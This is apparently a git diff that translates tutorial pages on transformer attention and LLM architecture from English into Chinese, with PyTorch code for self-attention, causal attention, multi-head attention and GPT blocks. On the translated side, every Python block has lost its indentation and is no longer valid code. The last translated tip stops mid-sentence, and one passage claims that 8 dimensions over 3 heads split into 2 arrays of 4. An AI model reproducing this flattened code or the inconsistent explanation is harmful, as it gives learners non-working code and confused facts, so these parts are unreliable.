+> 只需将查询的每个维度值与每个标记的相关维度相乘并加上结果。你将为每对标记获得1个值。
 
-For each word in the sentence, compute the **attention score** with respect to "shiny" by calculating the dot product of their embeddings.
+对于句子中的每个单词，通过计算它们嵌入的点积来计算与 "shiny" 的**注意分数**。
 
-**Attention Score between "Hello" and "shiny"**
+**"Hello" 和 "shiny" 之间的注意分数**
 
 <figure><img src="../../images/image (4) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
 
-**Attention Score between "shiny" and "shiny"**
+**"shiny" 和 "shiny" 之间的注意分数**
 
 <figure><img src="../../images/image (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
 
-**Attention Score between "sun" and "shiny"**
+**"sun" 和 "shiny" 之间的注意分数**
 
 <figure><img src="../../images/image (2) (1) (1) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
 
-#### Step 2: Normalize Attention Scores to Obtain Attention Weights
+#### 步骤2：归一化注意分数以获得注意权重
 
 > [!TIP]
-> Don't get lost in the mathematical terms, the goal of this function is simple, normalize all the weights so **they sum 1 in total**.
+> 不要迷失在数学术语中，这个函数的目标很简单，归一化所有权重，使**它们的总和为1**。
 >
-> Moreover, **softmax** function is used because it accentuates differences due to the exponential part, making easier to detect useful values.
+> 此外，**softmax** 函数被使用，因为它通过指数部分强调差异，使得更容易检测有用的值。
 
-Apply the **softmax function** to the attention scores to convert them into attention weights that sum to 1.
+应用**softmax函数**将注意分数转换为总和为1的注意权重。
 
 <figure><img src="../../images/image (3) (1) (1) (1) (1).png" alt="" width="293"><figcaption></figcaption></figure>
 
-Calculating the exponentials:
+计算指数：
 
 <figure><img src="../../images/image (4) (1) (1) (1).png" alt="" width="249"><figcaption></figcaption></figure>
 
-Calculating the sum:
+计算总和：
 
 <figure><img src="../../images/image (5) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
 
-Calculating attention weights:
+计算注意权重：
 
 <figure><img src="../../images/image (6) (1) (1).png" alt="" width="404"><figcaption></figcaption></figure>
 
-#### Step 3: Compute the Context Vector
+#### 步骤3：计算上下文向量
 
 > [!TIP]
-> Just get each attention weight and multiply it to the related token dimensions and then sum all the dimensions to get just 1 vector (the context vector)&#x20;
+> 只需获取每个注意权重并将其乘以相关标记的维度，然后将所有维度相加以获得一个向量（上下文向量）&#x20;
 
-The **context vector** is computed as the weighted sum of the embeddings of all words, using the attention weights.
+**上下文向量**是通过使用注意权重对所有单词的嵌入进行加权求和计算得出的。
 
 <figure><img src="../../images/image (16).png" alt="" width="369"><figcaption></figcaption></figure>
 
-Calculating each component:
+计算每个分量：
 
-- **Weighted Embedding of "Hello"**:
+- **"Hello" 的加权嵌入**：
 
-  <figure><img src="../../images/image (7) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../images/image (7) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-- **Weighted Embedding of "shiny"**:
+- **"shiny" 的加权嵌入**：
 
-  <figure><img src="../../images/image (8) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../images/image (8) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-- **Weighted Embedding of "sun"**:
+- **"sun" 的加权嵌入**：
 
-  <figure><img src="../../images/image (9) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../images/image (9) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-Summing the weighted embeddings:
+加权嵌入求和：
 
 `context vector=[0.0779+0.2156+0.1057, 0.0504+0.1382+0.1972, 0.1237+0.3983+0.3390]=[0.3992,0.3858,0.8610]`
 
-**This context vector represents the enriched embedding for the word "shiny," incorporating information from all words in the sentence.**
+**这个上下文向量表示了“shiny”的丰富嵌入，结合了句子中所有单词的信息。**
 
-### Summary of the Process
+### 过程总结
 
-1. **Compute Attention Scores**: Use the dot product between the embedding of the target word and the embeddings of all words in the sequence.
-2. **Normalize Scores to Get Attention Weights**: Apply the softmax function to the attention scores to obtain weights that sum to 1.
-3. **Compute Context Vector**: Multiply each word's embedding by its attention weight and sum the results.
+1. **计算注意分数**：使用目标单词的嵌入与序列中所有单词的嵌入之间的点积。
+2. **归一化分数以获得注意权重**：对注意分数应用softmax函数以获得总和为1的权重。
+3. **计算上下文向量**：将每个单词的嵌入乘以其注意权重并求和结果。
 
-## Self-Attention with Trainable Weights
+## 带可训练权重的自注意力
 
-In practice, self-attention mechanisms use **trainable weights** to learn the best representations for queries, keys, and values. This involves introducing three weight matrices:
+在实践中，自注意力机制使用**可训练权重**来学习查询、键和值的最佳表示。这涉及引入三个权重矩阵：
 
 <figure><img src="../../images/image (10) (1) (1).png" alt="" width="239"><figcaption></figcaption></figure>
 
-The query is the data to use like before, while the keys and values matrices are just random-trainable matrices.
+查询是像以前一样使用的数据，而键和值矩阵只是随机可训练的矩阵。
 
-#### Step 1: Compute Queries, Keys, and Values
+#### 步骤1：计算查询、键和值
 
-Each token will have its own query, key and value matrix by multiplying its dimension values by the defined matrices:
+每个标记将通过将其维度值与定义的矩阵相乘来拥有自己的查询、键和值矩阵：
 
 <figure><img src="../../images/image (11).png" alt="" width="253"><figcaption></figcaption></figure>
 
-These matrices transform the original embeddings into a new space suitable for computing attention.
+这些矩阵将原始嵌入转换为适合计算注意力的新空间。
 
-**Example**
+**示例**
 
-Assuming:
+假设：
 
-- Input dimension `din=3` (embedding size)
-- Output dimension `dout=2` (desired dimension for queries, keys, and values)
-
-Initialize the weight matrices:
+- 输入维度 `din=3`（嵌入大小）
+- 输出维度 `dout=2`（查询、键和值的期望维度）
 
+初始化权重矩阵：
 ```python
 import torch.nn as nn
 
@@ -148,77 +147,73 @@ W_query = nn.Parameter(torch.rand(d_in, d_out))
 W_key = nn.Parameter(torch.rand(d_in, d_out))
 W_value = nn.Parameter(torch.rand(d_in, d_out))
 ```
-
-Compute queries, keys, and values:
-
+计算查询、键和值：
 ```python
 queries = torch.matmul(inputs, W_query)
 keys = torch.matmul(inputs, W_key)
 values = torch.matmul(inputs, W_value)
 ```
+#### 第2步：计算缩放点积注意力
 
-#### Step 2: Compute Scaled Dot-Product Attention
+**计算注意力分数**
 
-**Compute Attention Scores**
-
-Similar to the example from before, but this time, instead of using the values of the dimensions of the tokens, we use the key matrix of the token (calculated already using the dimensions):. So, for each query `qi`​ and key `kj​`:
+与之前的示例类似，但这次我们使用的是令牌的键矩阵（已经使用维度计算得出），而不是令牌的维度值。因此，对于每个查询 `qi`​ 和键 `kj​`：
 
 <figure><img src="../../images/image (12).png" alt=""><figcaption></figcaption></figure>
 
-**Scale the Scores**
+**缩放分数**
 
-To prevent the dot products from becoming too large, scale them by the square root of the key dimension `dk`​:
+为了防止点积变得过大，通过键维度 `dk`​ 的平方根来缩放它们：
 
 <figure><img src="../../images/image (13).png" alt="" width="295"><figcaption></figcaption></figure>
 
 > [!TIP]
-> The score is divided by the square root of the dimensions because dot products might become very large and this helps to regulate them.
+> 分数除以维度的平方根是因为点积可能变得非常大，这有助于调节它们。
 
-**Apply Softmax to Obtain Attention Weights:** Like in the initial example, normalize all the values so they sum 1.&#x20;
+**应用Softmax以获得注意力权重：** 与最初的示例一样，规范化所有值，使它们的总和为1。&#x20;
 
 <figure><img src="../../images/image (14).png" alt="" width="295"><figcaption></figcaption></figure>
 
-#### Step 3: Compute Context Vectors
+#### 第3步：计算上下文向量
 
-Like in the initial example, just sum all the values matrices multiplying each one by its attention weight:
+与最初的示例一样，只需将所有值矩阵相加，每个值乘以其注意力权重：
 
 <figure><img src="../../images/image (15).png" alt="" width="328"><figcaption></figcaption></figure>
 
-### Code Example
-
-Grabbing an example from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb) you can check this class that implements the self-attendant functionality we talked about:
+### 代码示例
 
+从 [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb) 获取一个示例，您可以查看这个实现我们所讨论的自注意力功能的类：
 ```python
 import torch
 
 inputs = torch.tensor(
-  [[0.43, 0.15, 0.89], # Your     (x^1)
-   [0.55, 0.87, 0.66], # journey  (x^2)
-   [0.57, 0.85, 0.64], # starts   (x^3)
-   [0.22, 0.58, 0.33], # with     (x^4)
-   [0.77, 0.25, 0.10], # one      (x^5)
-   [0.05, 0.80, 0.55]] # step     (x^6)
+[[0.43, 0.15, 0.89], # Your     (x^1)
+[0.55, 0.87, 0.66], # journey  (x^2)
+[0.57, 0.85, 0.64], # starts   (x^3)
+[0.22, 0.58, 0.33], # with     (x^4)
+[0.77, 0.25, 0.10], # one      (x^5)
+[0.05, 0.80, 0.55]] # step     (x^6)
 )
 
 import torch.nn as nn
 class SelfAttention_v2(nn.Module):
 
-    def __init__(self, d_in, d_out, qkv_bias=False):
-        super().__init__()
-        self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
-        self.W_key   = nn.Linear(d_in, d_out, bias=qkv_bias)
-        self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
+def __init__(self, d_in, d_out, qkv_bias=False):
+super().__init__()
+self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
+self.W_key   = nn.Linear(d_in, d_out, bias=qkv_bias)
+self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
 
-    def forward(self, x):
-        keys = self.W_key(x)
-        queries = self.W_query(x)
-        values = self.W_value(x)
+def forward(self, x):
+keys = self.W_key(x)
+queries = self.W_query(x)
+values = self.W_value(x)
 
-        attn_scores = queries @ keys.T
-        attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
+attn_scores = queries @ keys.T
+attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
 
-        context_vec = attn_weights @ values
-        return context_vec
+context_vec = attn_weights @ values
+return context_vec
 
 d_in=3
 d_out=2
@@ -226,60 +221,56 @@ torch.manual_seed(789)
 sa_v2 = SelfAttention_v2(d_in, d_out)
 print(sa_v2(inputs))
 ```
-
 > [!NOTE]
-> Note that instead of initializing the matrices with random values, `nn.Linear` is used to mark all the wights as parameters to train.
+> 请注意，`nn.Linear` 用于将所有权重标记为训练参数，而不是用随机值初始化矩阵。
 
-## Causal Attention: Hiding Future Words
+## 因果注意力：隐藏未来词汇
 
-For LLMs we want the model to consider only the tokens that appear before the current position in order to **predict the next token**. **Causal attention**, also known as **masked attention**, achieves this by modifying the attention mechanism to prevent access to future tokens.
+对于 LLM，我们希望模型仅考虑当前位之前出现的标记，以便 **预测下一个标记**。**因果注意力**，也称为 **掩蔽注意力**，通过修改注意力机制来防止访问未来标记，从而实现这一点。
 
-### Applying a Causal Attention Mask
+### 应用因果注意力掩码
 
-To implement causal attention, we apply a mask to the attention scores **before the softmax operation** so the reminding ones will still sum 1. This mask sets the attention scores of future tokens to negative infinity, ensuring that after the softmax, their attention weights are zero.
+为了实现因果注意力，我们在 **softmax 操作之前** 对注意力分数应用掩码，以便剩余的分数仍然相加为 1。该掩码将未来标记的注意力分数设置为负无穷，确保在 softmax 之后，它们的注意力权重为零。
 
-**Steps**
+**步骤**
 
-1. **Compute Attention Scores**: Same as before.
-2. **Apply Mask**: Use an upper triangular matrix filled with negative infinity above the diagonal.
+1. **计算注意力分数**：与之前相同。
+2. **应用掩码**：使用一个上三角矩阵，在对角线以上填充负无穷。
 
-   ```python
-   mask = torch.triu(torch.ones(seq_len, seq_len), diagonal=1) * float('-inf')
-   masked_scores = attention_scores + mask
-   ```
+```python
+mask = torch.triu(torch.ones(seq_len, seq_len), diagonal=1) * float('-inf')
+masked_scores = attention_scores + mask
+```
 
-3. **Apply Softmax**: Compute attention weights using the masked scores.
+3. **应用 Softmax**：使用掩蔽分数计算注意力权重。
 
-   ```python
-   attention_weights = torch.softmax(masked_scores, dim=-1)
-   ```
+```python
+attention_weights = torch.softmax(masked_scores, dim=-1)
+```
 
-### Masking Additional Attention Weights with Dropout
-
-To **prevent overfitting**, we can apply **dropout** to the attention weights after the softmax operation. Dropout **randomly zeroes some of the attention weights** during training.
+### 使用 Dropout 掩蔽额外的注意力权重
 
+为了 **防止过拟合**，我们可以在 softmax 操作后对注意力权重应用 **dropout**。Dropout **在训练期间随机将一些注意力权重置为零**。
 ```python
 dropout = nn.Dropout(p=0.5)
 attention_weights = dropout(attention_weights)
 ```
+常规的 dropout 约为 10-20%。
 
-A regular dropout is about 10-20%.
-
-### Code Example
-
-Code example from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb):
+### 代码示例
 
+代码示例来自 [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb):
 ```python
 import torch
 import torch.nn as nn
 
 inputs = torch.tensor(
-  [[0.43, 0.15, 0.89], # Your     (x^1)
-   [0.55, 0.87, 0.66], # journey  (x^2)
-   [0.57, 0.85, 0.64], # starts   (x^3)
-   [0.22, 0.58, 0.33], # with     (x^4)
-   [0.77, 0.25, 0.10], # one      (x^5)
-   [0.05, 0.80, 0.55]] # step     (x^6)
+[[0.43, 0.15, 0.89], # Your     (x^1)
+[0.55, 0.87, 0.66], # journey  (x^2)
+[0.57, 0.85, 0.64], # starts   (x^3)
+[0.22, 0.58, 0.33], # with     (x^4)
+[0.77, 0.25, 0.10], # one      (x^5)
+[0.05, 0.80, 0.55]] # step     (x^6)
 )
 
 batch = torch.stack((inputs, inputs), dim=0)
@@ -287,36 +278,36 @@ print(batch.shape)
 
 class CausalAttention(nn.Module):
 
-    def __init__(self, d_in, d_out, context_length,
-                 dropout, qkv_bias=False):
-        super().__init__()
-        self.d_out = d_out
-        self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
-        self.W_key   = nn.Linear(d_in, d_out, bias=qkv_bias)
-        self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
-        self.dropout = nn.Dropout(dropout)
-        self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1)) # New
+def __init__(self, d_in, d_out, context_length,
+dropout, qkv_bias=False):
+super().__init__()
+self.d_out = d_out
+self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
+self.W_key   = nn.Linear(d_in, d_out, bias=qkv_bias)
+self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
+self.dropout = nn.Dropout(dropout)
+self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1)) # New
 
-    def forward(self, x):
-        b, num_tokens, d_in = x.shape
-        # b is the num of batches
-        # num_tokens is the number of tokens per batch
-        # d_in is the dimensions er token
+def forward(self, x):
+b, num_tokens, d_in = x.shape
+# b is the num of batches
+# num_tokens is the number of tokens per batch
+# d_in is the dimensions er token
 
-        keys = self.W_key(x) # This generates the keys of the tokens
-        queries = self.W_query(x)
-        values = self.W_value(x)
+keys = self.W_key(x) # This generates the keys of the tokens
+queries = self.W_query(x)
+values = self.W_value(x)
 
-        attn_scores = queries @ keys.transpose(1, 2) # Moves the third dimension to the second one and the second one to the third one to be able to multiply
-        attn_scores.masked_fill_(  # New, _ ops are in-place
-            self.mask.bool()[:num_tokens, :num_tokens], -torch.inf)  # `:num_tokens` to account for cases where the number of tokens in the batch is smaller than the supported context_size
-        attn_weights = torch.softmax(
-            attn_scores / keys.shape[-1]**0.5, dim=-1
-        )
-        attn_weights = self.dropout(attn_weights)
+attn_scores = queries @ keys.transpose(1, 2) # Moves the third dimension to the second one and the second one to the third one to be able to multiply
+attn_scores.masked_fill_(  # New, _ ops are in-place
+self.mask.bool()[:num_tokens, :num_tokens], -torch.inf)  # `:num_tokens` to account for cases where the number of tokens in the batch is smaller than the supported context_size
+attn_weights = torch.softmax(
+attn_scores / keys.shape[-1]**0.5, dim=-1
+)
+attn_weights = self.dropout(attn_weights)
 
-        context_vec = attn_weights @ values
-        return context_vec
+context_vec = attn_weights @ values
+return context_vec
 
 torch.manual_seed(123)
 
@@ -330,78 +321,76 @@ context_vecs = ca(batch)
 print(context_vecs)
 print("context_vecs.shape:", context_vecs.shape)
 ```
+## 扩展单头注意力到多头注意力
 
-## Extending Single-Head Attention to Multi-Head Attention
+**多头注意力** 在实际操作中是指执行 **多个实例** 的自注意力函数，每个实例都有 **自己的权重**，因此计算出不同的最终向量。
 
-**Multi-head attention** in practical terms consist on executing **multiple instances** of the self-attention function each of them with **their own weights** so different final vectors are calculated.
-
-### Code Example
-
-It could be possible to reuse the previous code and just add a wrapper that launches it several time, but this is a more optimised version from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb) that processes all the heads at the same time (reducing the number of expensive for loops). As you can see in the code, the dimensions of each token is divided in different dimensions according to the number of heads. This way if token have 8 dimensions and we want to use 3 heads, the dimensions will be divided in 2 arrays of 4 dimensions and each head will use one of them:
+### 代码示例
 
+可以重用之前的代码，只需添加一个包装器来多次启动它，但这是一个更优化的版本，来自 [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb)，它同时处理所有头（减少了昂贵的 for 循环数量）。正如您在代码中看到的，每个标记的维度根据头的数量被划分为不同的维度。这样，如果标记有 8 个维度，而我们想使用 3 个头，维度将被划分为 2 个 4 维的数组，每个头将使用其中一个：
 ```python
 class MultiHeadAttention(nn.Module):
-    def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False):
-        super().__init__()
-        assert (d_out % num_heads == 0), \
-            "d_out must be divisible by num_heads"
+def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False):
+super().__init__()
+assert (d_out % num_heads == 0), \
+"d_out must be divisible by num_heads"
 
-        self.d_out = d_out
-        self.num_heads = num_heads
-        self.head_dim = d_out // num_heads # Reduce the projection dim to match desired output dim
+self.d_out = d_out
+self.num_heads = num_heads
+self.head_dim = d_out // num_heads # Reduce the projection dim to match desired output dim
 
-        self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
-        self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
-        self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
-        self.out_proj = nn.Linear(d_out, d_out)  # Linear layer to combine head outputs
-        self.dropout = nn.Dropout(dropout)
-        self.register_buffer(
-            "mask",
-            torch.triu(torch.ones(context_length, context_length),
-                       diagonal=1)
-        )
+self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
+self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
+self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
+self.out_proj = nn.Linear(d_out, d_out)  # Linear layer to combine head outputs
+self.dropout = nn.Dropout(dropout)
+self.register_buffer(
+"mask",
+torch.triu(torch.ones(context_length, context_length),
+diagonal=1)
+)
 
-    def forward(self, x):
-        b, num_tokens, d_in = x.shape
-        # b is the num of batches
-        # num_tokens is the number of tokens per batch
-        # d_in is the dimensions er token
+def forward(self, x):
+b, num_tokens, d_in = x.shape
+# b is the num of batches
+# num_tokens is the number of tokens per batch
+# d_in is the dimensions er token
 
-        keys = self.W_key(x) # Shape: (b, num_tokens, d_out)
-        queries = self.W_query(x)
-        values = self.W_value(x)
+keys = self.W_key(x) # Shape: (b, num_tokens, d_out)
+queries = self.W_query(x)
+values = self.W_value(x)
 
-        # We implicitly split the matrix by adding a `num_heads` dimension
-        # Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim)
-        keys = keys.view(b, num_tokens, self.num_heads, self.head_dim)
-        values = values.view(b, num_tokens, self.num_heads, self.head_dim)
-        queries = queries.view(b, num_tokens, self.num_heads, self.head_dim)
+# We implicitly split the matrix by adding a `num_heads` dimension
+# Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim)
+keys = keys.view(b, num_tokens, self.num_heads, self.head_dim)
+values = values.view(b, num_tokens, self.num_heads, self.head_dim)
+queries = queries.view(b, num_tokens, self.num_heads, self.head_dim)
 
-        # Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim)
-        keys = keys.transpose(1, 2)
-        queries = queries.transpose(1, 2)
-        values = values.transpose(1, 2)
+# Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim)
+keys = keys.transpose(1, 2)
+queries = queries.transpose(1, 2)
+values = values.transpose(1, 2)
 
-        # Compute scaled dot-product attention (aka self-attention) with a causal mask
-        attn_scores = queries @ keys.transpose(2, 3)  # Dot product for each head
+# Compute scaled dot-product attention (aka self-attention) with a causal mask
+attn_scores = queries @ keys.transpose(2, 3)  # Dot product for each head
 
-        # Original mask truncated to the number of tokens and converted to boolean
-        mask_bool = self.mask.bool()[:num_tokens, :num_tokens]
+# Original mask truncated to the number of tokens and converted to boolean
+mask_bool = self.mask.bool()[:num_tokens, :num_tokens]
 
-        # Use the mask to fill attention scores
-        attn_scores.masked_fill_(mask_bool, -torch.inf)
+# Use the mask to fill attention scores
+attn_scores.masked_fill_(mask_bool, -torch.inf)
 
-        attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
-        attn_weights = self.dropout(attn_weights)
+attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
+attn_weights = self.dropout(attn_weights)
 
-        # Shape: (b, num_tokens, num_heads, head_dim)
-        context_vec = (attn_weights @ values).transpose(1, 2)
+# Shape: (b, num_tokens, num_heads, head_dim)
+context_vec = (attn_weights @ values).transpose(1, 2)
 
-        # Combine heads, where self.d_out = self.num_heads * self.head_dim
-        context_vec = context_vec.contiguous().view(b, num_tokens, self.d_out)
-        context_vec = self.out_proj(context_vec) # optional projection
+# Combine heads, where self.d_out = self.num_heads * self.head_dim
+context_vec = context_vec.contiguous().view(b, num_tokens, self.d_out)
+context_vec = self.out_proj(context_vec) # optional projection
 
-        return context_vec
+return context_vec
 
 torch.manual_seed(123)
 
@@ -415,15 +404,9 @@ print(context_vecs)
 print("context_vecs.shape:", context_vecs.shape)
 
 ```
-
-For another compact and efficient implementation you could use the [`torch.nn.MultiheadAttention`](https://pytorch.org/docs/stable/generated/torch.nn.MultiheadAttention.html) class in PyTorch.
+对于另一个紧凑且高效的实现，您可以在 PyTorch 中使用 [`torch.nn.MultiheadAttention`](https://pytorch.org/docs/stable/generated/torch.nn.MultiheadAttention.html) 类。
 
 > [!TIP]
-> Short answer of ChatGPT about why it's better to divide dimensions of tokens among the heads instead of having each head check all the dimensions of all the tokens:
+> ChatGPT 关于为什么将令牌的维度分配给各个头而不是让每个头检查所有令牌的所有维度的简短回答：
 >
-> While allowing each head to process all embedding dimensions might seem advantageous because each head would have access to the full information, the standard practice is to **divide the embedding dimensions among the heads**. This approach balances computational efficiency with model performance and encourages each head to learn diverse representations. Therefore, splitting the embedding dimensions is generally preferred over having each head check all dimensions.
-
-## References
-
-- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
-
+> 尽管允许每个头处理所有嵌入维度似乎是有利的，因为每个头将能够访问完整的信息，但标准做法是 **将嵌入维度分配给各个头**。这种方法在计算效率与模型性能之间取得了平衡，并鼓励每个头学习多样化的表示。因此，通常
diff --git a/src/todo/llm-training-data-preparation/5.-llm-architecture.md b/src/todo/llm-training-data-preparation/5.-llm-architecture.md
index dc2f7f2e3..c0465d954 100644
--- a/src/todo/llm-training-data-preparation/5.-llm-architecture.md
+++ b/src/todo/llm-training-data-preparation/5.-llm-architecture.md
@@ -1,192 +1,191 @@
-# 5. LLM Architecture
+# 5. LLM架构
 
-## LLM Architecture
+## LLM架构
 
 > [!TIP]
-> The goal of this fifth phase is very simple: **Develop the architecture of the full LLM**. Put everything together, apply all the layers and create all the functions to generate text or transform text to IDs and backwards.
+> 第五阶段的目标非常简单：**开发完整LLM的架构**。将所有内容整合在一起，应用所有层并创建所有功能以生成文本或将文本转换为ID及其反向操作。
 >
-> This architecture will be used for both, training and predicting text after it was trained.
+> 该架构将用于训练和预测文本，训练后进行预测。
 
-LLM architecture example from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb):
+LLM架构示例来自 [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb):
 
-A high level representation can be observed in:
+可以观察到高层次的表示：
 
 <figure><img src="../../images/image (3) (1) (1) (1).png" alt="" width="563"><figcaption><p><a href="https://camo.githubusercontent.com/6c8c392f72d5b9e86c94aeb9470beab435b888d24135926f1746eb88e0cc18fb/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830345f636f6d707265737365642f31332e776562703f31">https://camo.githubusercontent.com/6c8c392f72d5b9e86c94aeb9470beab435b888d24135926f1746eb88e0cc18fb/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830345f636f6d707265737365642f31332e776562703f31</a></p></figcaption></figure>
 
-1. **Input (Tokenized Text)**: The process begins with tokenized text, which is converted into numerical representations.
-2. **Token Embedding and Positional Embedding Layer**: The tokenized text is passed through a **token embedding** layer and a **positional embedding layer**, which captures the position of tokens in a sequence, critical for understanding word order.
-3. **Transformer Blocks**: The model contains **12 transformer blocks**, each with multiple layers. These blocks repeat the following sequence:
-   - **Masked Multi-Head Attention**: Allows the model to focus on different parts of the input text at once.
-   - **Layer Normalization**: A normalization step to stabilize and improve training.
-   - **Feed Forward Layer**: Responsible for processing the information from the attention layer and making predictions about the next token.
-   - **Dropout Layers**: These layers prevent overfitting by randomly dropping units during training.
-4. **Final Output Layer**: The model outputs a **4x50,257-dimensional tensor**, where **50,257** represents the size of the vocabulary. Each row in this tensor corresponds to a vector that the model uses to predict the next word in the sequence.
-5. **Goal**: The objective is to take these embeddings and convert them back into text. Specifically, the last row of the output is used to generate the next word, represented as "forward" in this diagram.
-
-### Code representation
+1. **输入（标记化文本）**：该过程以标记化文本开始，该文本被转换为数值表示。
+2. **标记嵌入和位置嵌入层**：标记化文本通过**标记嵌入**层和**位置嵌入层**，后者捕捉序列中标记的位置，这对理解单词顺序至关重要。
+3. **变换器块**：模型包含**12个变换器块**，每个块有多个层。这些块重复以下序列：
+- **掩蔽多头注意力**：允许模型同时关注输入文本的不同部分。
+- **层归一化**：一个归一化步骤，以稳定和改善训练。
+- **前馈层**：负责处理来自注意力层的信息并对下一个标记进行预测。
+- **丢弃层**：这些层通过在训练期间随机丢弃单元来防止过拟合。
+4. **最终输出层**：模型输出一个**4x50,257维的张量**，其中**50,257**表示词汇表的大小。该张量中的每一行对应于模型用于预测序列中下一个单词的向量。
+5. **目标**：目标是将这些嵌入转换回文本。具体来说，输出的最后一行用于生成下一个单词，在该图中表示为“前进”。 
 
+### 代码表示
 ```python
 import torch
 import torch.nn as nn
 import tiktoken
 
 class GELU(nn.Module):
-    def __init__(self):
-        super().__init__()
+def __init__(self):
+super().__init__()
 
-    def forward(self, x):
-        return 0.5 * x * (1 + torch.tanh(
-            torch.sqrt(torch.tensor(2.0 / torch.pi)) *
-            (x + 0.044715 * torch.pow(x, 3))
-        ))
+def forward(self, x):
+return 0.5 * x * (1 + torch.tanh(
+torch.sqrt(torch.tensor(2.0 / torch.pi)) *
+(x + 0.044715 * torch.pow(x, 3))
+))
 
 class FeedForward(nn.Module):
-    def __init__(self, cfg):
-        super().__init__()
-        self.layers = nn.Sequential(
-            nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]),
-            GELU(),
-            nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]),
-        )
+def __init__(self, cfg):
+super().__init__()
+self.layers = nn.Sequential(
+nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]),
+GELU(),
+nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]),
+)
 
-    def forward(self, x):
-        return self.layers(x)
+def forward(self, x):
+return self.layers(x)
 
 class MultiHeadAttention(nn.Module):
-    def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False):
-        super().__init__()
-        assert d_out % num_heads == 0, "d_out must be divisible by num_heads"
+def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False):
+super().__init__()
+assert d_out % num_heads == 0, "d_out must be divisible by num_heads"
 
-        self.d_out = d_out
-        self.num_heads = num_heads
-        self.head_dim = d_out // num_heads # Reduce the projection dim to match desired output dim
+self.d_out = d_out
+self.num_heads = num_heads
+self.head_dim = d_out // num_heads # Reduce the projection dim to match desired output dim
 
-        self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
-        self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
-        self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
-        self.out_proj = nn.Linear(d_out, d_out)  # Linear layer to combine head outputs
-        self.dropout = nn.Dropout(dropout)
-        self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1))
+self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
+self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
